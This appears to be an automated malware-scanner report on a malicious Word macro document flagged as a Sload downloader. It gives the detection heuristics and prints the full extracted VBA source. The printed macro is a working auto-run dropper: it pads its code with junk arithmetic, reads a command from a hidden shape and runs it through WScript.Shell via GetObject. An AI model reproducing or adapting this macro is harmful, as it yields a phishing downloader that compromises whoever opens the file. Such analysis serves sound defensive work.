MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with a Document_Open auto-execution routine. This macro references PowerShell and appears to be designed to download and execute a second-stage payload. The ClamAV heuristic also flags it as a downloader. The embedded URL is benign, but the overall behavior indicates a malicious downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Sload-6784189-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6784189-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set NsPfn = CVar(GetObject(raSQwZz + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + DJMQGi)) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8741 bytes |
SHA-256: 4d4466144610cada7659c1b10fcf4c3a37a4a0326f380c5dd1bd67519877caaf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
163 of 242 identifiers look randomly generated (e.g. 'iQPjqJZluLdVMM') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wwGsdRiTitRA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
THqRRIR = (lErjh - Oct(uYEzbKjk) * pCMjl - Sgn(16254852) - 260192071 + Fix(GquiHX) + 2666806439# + 83717155 / 191528468 / wjBWsdjP)
Select Case lKOAui
Case 8241528
PEbfD = CLng(327157011)
ltnDmAPn = Int(amBETKjzW)
Case 279727785
Hrpzv = Hex(42446528)
ZIBEtlP = CStr(244271823 * CByte(pdcLVXQaH))
End Select
On Error Resume Next
sSDNRGz = (aFNhQtTnv - Oct(WqWrXbNZE) * PsAzzAsHM - Sgn(204164092) - 319555427 + Fix(oZMTh) + 3340498839# + 167978515 / 282218105 / HGcZpIB)
Select Case cArBIiiFO
Case 225239061
BLbQwS = CLng(11130410)
iEtOAOTHl = Int(ZJsqMki)
Case 30050527
jviOS = Hex(108810822)
pMjqj = CStr(43595956 * CByte(LXqilrnp))
End Select
On Error Resume Next
AqVDqqcor = (CicRJzGD - Oct(tmqDdCXwU) * GLzJihpHo - Sgn(319496806) - 260683907 + Fix(ANImohFr) + 579316999 + 214880629 / 327399344 / oHKnsA)
Select Case uHtlTD
Case 137091289
kTqRHGImd = CLng(304707626)
OpqdmZNiU = Int(XBPndtd)
Case 48158117
pjTjVXS = Hex(96778536)
OjVjtBmdD = CStr(198840084 * CByte(LFZAb))
End Select
Set aidNif = Shapes("iQPjqJZluLdVMM")
On Error Resume Next
iYlAiIL = (XJNcdYf - Oct(jWwawNz) * aKPmKKU - Sgn(123910447) - 61606490 + Fix(GaPRABH) + 2157307029# + 242642422 / 320404227 / IjcWMwS)
Select Case RXUYJZYsY
Case 108127464
ouTzRE = CLng(95301455)
VvSScD = Int(SanQzNCVs)
Case 39208205
CFrbIiQX = Hex(52535524)
okKRwdwC = CStr(332470948 * CByte(sVMGw))
End Select
adawQroJnVV = "" + wmZbtf + bumjB + aidNif.TextFrame.TextRange.Text + AujtkcDa + CPODn + MdpcwzkG + VLNqfP + dIcJTOjG
On Error Resume Next
oHzoSaz = (rbkMDBP - Oct(cZZizErJU) * muSDipp - Sgn(92693812) - 110138863 + Fix(bEQwYTGoj) + 556885949 + 119858494 / 91197670 / kHohL)
Select Case jQqUooC
Case 66674671
suWpkRPY = CLng(60822419)
FfwCZML = Int(lhwtHdn)
Case 216065219
kkbKVJSv = Hex(269677860)
cdrUjfHG = CStr(314115943 * CByte(NRIdQRcr))
End Select
On Error Resume Next
qtiwPqqqr = (iFkbq - Oct(NIhqU) * ElZWDmhA - Sgn(134343339) - 237637073 + Fix(izaDTt) + 3249287139# + 296835164 / 72784199 / pLTbpht)
Select Case rwmfCp
Case 294762921
tnEIqlw = CLng(290096239)
bQAuP = Int(wJLPaGvN)
Case 31353594
nclbzzkL = Hex(318322828)
KoCmD = CStr(85516992 * CByte(VORtScO))
End Select
On Error Resume Next
pzqbpw = (Nocnw - Oct(EjbBrzd) * ckDMibc - Sgn(171542524) - 104631097 + Fix(dEijH) + 522748789 + 282946129 / 270714741 / PqpTL)
Select Case tOjPIM
Case 296545055
wNPnPGXf = CLng(261784565)
SJruVYT = Int(CsOimQ)
Case 288333649
pMtKGzkVm = Hex(145268929)
UbiijDRAB = CStr(139310951 * CByte(tKvwKAUSa))
End Select
On Error Resume Next
jcCCw = (PVjwIsZ - Oct(kwkBCqk) * TYZzzFv - Sgn(304753296) - 73875961 + Fix(rViNCdBQd) + 251646219 + 186039893 / 262079247 / NZlQBcH)
Select Case iYJIidz
Case 199205996
aplLAD = CLng(283817342)
uHAmNju = Int(AMXNouRD)
Case 135984140
zUEXz = Hex(11123146)
SdnCLNVu = CStr(304156083 * CByte(VGpVr))
End Select
On Error Resume Next
QikmUKI = (MLkVfo - Oct(KijHV) * WRRJBRqP - Sgn(249797288) - 299529015 + Fix(ZhQwL) + 1029854079 + 161773699 / 105920874 / ucjMVq)
Select Case zuwBnzkt
Case 84095644
dStSwa = CLng(121071265)
wwYJzSIr = Int(rtiEn)
Case 77610053
qUnrOZwW = Hex(233423673)
mFWwwCRiZ = CStr(289140410 * CByte(qvftwv))
End Select
Set NsPfn = CVar(GetObject(raSQwZz + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + DJMQGi))
On Error Resume Next
dlUdjzYN = (kBXDduS - Oct(vUiTZDfO) * aNjQfsv - Sgn(43531282) - 175764035 + Fix(oQnjPRipX) + 3074713629# + 121768141 / 146901252 / zKjjz)
Select Case EipPNX
Case 76505284
EFIcwCv = CLng(194115602)
InOCqN = Int(TDDFm)
Case 35747075
LwoVQzBZI = Hex(27882334)
dkPSVTLT = CStr(307336241 * CByte(tkPNVhv))
End Select
On Error Resume Next
IpidYVwS = (pSXpRN - Oct(LPCrAn) * ENnvotdJ - Sgn(195765704) - 65589282 + Fix(lKjlL) + 1037909999 + 52096934 / 15158124 / wOrdzrSNK)
Select Case hhUGZ
Case 102480885
aHYkfoNo = CLng(208059800)
nZEmj = Int(ojqWJwwaQ)
Case 334958641
cTRDGV = Hex(168399726)
zdOTadoR = CStr(267033422 * CByte(nGXwjfWj))
End Select
On Error Resume Next
PPFGTAG = (CCroYHlcR - Oct(bjjupf) * KABdSzt - Sgn(108183540) - 142138094 + Fix(UfaCbq) + 1163874609 + 252767493 / 188406800 / zjkia)
Select Case mHurUZa
Case 186893514
AFSjF = CLng(332954720)
CtQzqIA = Int(RHMbjdQSC)
Case 305102302
lVitvE = Hex(330948637)
blzCXEZdr = CStr(118472605 * CByte(hiHEZMM))
End Select
On Error Resume Next
fLmqcNjlT = (nmqBhG - Oct(sMfiujEo) * RvQwZKd - Sgn(77023649) - 231621473 + Fix(LtkPHllZ) + 593149109 + 334259077 / 327432099 / BtYOLw)
Select Case kiiCD
Case 317880386
VVscIfRB = CLng(314170906)
IwXzIGvp = Int(DtXaKwh)
Case 28043249
CcrjTTQQh = Hex(210954918)
SvAziGOYK = CStr(182100737 * CByte(nMdsuzu))
End Select
Const LoILIjh = 0
On Error Resume Next
MDXqnEB = (cSDXRG - Oct(ADDuwXop) * UoihmDGUb - Sgn(253867418) - 8898535 + Fix(ZIkRibjKm) + 873724509 + 91872729 / 81739841 / qnlpGHYO)
Select Case WzaTZZM
Case 228557408
iEpavScQv = CLng(27969388)
HHaRzvP = Int(iVichv)
Case 249350477
rOCKwDRj = Hex(50579338)
PsTMqMUkV = CStr(100386613 * CByte(IUdJsDa))
End Select
On Error Resume Next
qmwhSKFm = (DHTsZFz - Oct(iWupQ) * pwitIzbjj - Sgn(173197247) - 102811358 + Fix(NuBNaf) + 3126261219# + 87883287 / 156542880 / AiiMabUr)
Select Case wavGj
Case 241393330
wpvTbt = CLng(187727218)
rEGRvO = Int(DSHwzOwWA)
Case 101520497
WToSnScJ = Hex(231470145)
REGGG = CStr(132161679 * CByte(VUDwoC))
End Select
On Error Resume Next
AYBUYpNF = (YTKzi - Oct(vJaifrK) * RPOflsci - Sgn(161735825) - 25622183 + Fix(lUHqmuTKP) + 204349129 + 222913343 / 71747254 / qYnHczhoq)
Select Case kFJKbMZp
Case 311483811
DzHnT = CLng(258582140)
LjuhjEUo = Int(FUGbWF)
Case 307935284
XkcjszpN = Hex(253771887)
qtRAn = CStr(270850718 * CByte(WHvHBB))
End Select
On Error Resume Next
Aspuc = (LXohiUiY - Oct(LJUqMSiA) * OTwOdfk - Sgn(25773318) - 250585282 + Fix(HDcKmEm) + 1645259199 + 277079623 / 309992720 / SfOvdVVY)
Select Case iRrOjI
Case 260939075
uJzaiJRhj = CLng(338168843)
lZtsFnvo = Int(TzJPfYpp)
Case 75022855
ddQpij = Hex(328797857)
kVzNuW = CStr(259295592 * CByte(npYmbkUF))
End Select
wlkCATv = Array(mXJVZ, NsPfn.Run!(adawQroJnVV, LoILIjh), oomfol)
On Error Resume Next
Mvkzsjvs = (cwIKUp - Oct(oAqmmLjG) * dBNMkqUv - Sgn(245866966) - 208076657 + Fix(JuuDVcS) + 2723210739# + 327930823 / 193828870 / ziMDfsQtB)
Select Case iTOhhj
Case 227417240
cMYoRVtG = CLng(255203515)
JsrICi = Int(jzhKb)
Case 205007588
iIfbjVovk = Hex(22401724)
RaLNrJZ = CStr(38403952 * CByte(jJYVRjfwj))
End Select
On Error Resume Next
BOOjIzvjw = (ziYCjcrnA - Oct(KUHIZuDvL) * ZRdMMWz - Sgn(112292077) - 244411253 + Fix(LrVQuLQqX) + 491438899 + 239855516 / 132042828 / jlhHGHOtA)
Select Case TZjEMpJ
Case 191462467
CFnTwqN = CLng(93142354)
NXDsFUz = Int(fPsJXBK)
Case 144687316
rOGDB = Hex(92871017)
KRrtSiR = CStr(294830216 * CByte(jfdRaULHm))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.